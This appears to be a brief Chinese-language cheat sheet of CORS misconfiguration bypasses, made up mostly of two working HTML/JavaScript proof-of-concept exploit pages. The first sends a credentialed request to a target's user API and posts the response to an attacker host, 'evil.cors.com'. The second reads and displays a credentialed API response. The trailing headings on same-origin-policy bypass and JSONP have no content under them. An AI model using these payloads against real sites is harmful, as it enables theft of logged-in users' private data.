绕过方法整理
绕过 - 仅对域名校验
#POC #"Access-Control-Allow-Origin: https://xx.co & Access-Control-Allow- Credentials: true". #Origin: https://xx.co.evil.net, Access-Control-Allow-Origin: https://xx.co.evil.net. <html> <body> <button type='button' οnclick='cors()'>CORS</button> <p id='demo'></p> <script> function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { var a = this.responseText; document.getElementById("demo").innerHTML = a; xhttp.open("POST", "http://evil.cors.com", true); xhttp.withCredentials = true; console.log(a); xhttp.send("data="+a); } }; xhttp.open("GET", "https://www.xx.co/api/v1/users/*******", true); xhttp.withCredentials = true; xhttp.send(); } </script> </body> </html>
访问源未列入白名单,并且具备规则Access-Control-Allow-Credentials: true
<html> <body> <h2>CORS PoC</h2> <div id="demo"> <button type="button" οnclick="cors()">Exploit</button> </div> <script> function cors() { var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("demo").innerHTML = alert(this.responseText); } }; xhr.open("GET", "https://api.xx.com/endpoint", true); xhr.withCredentials = true; xhr.send(); } </script> </body> </html>
同源策略绕过
JSONP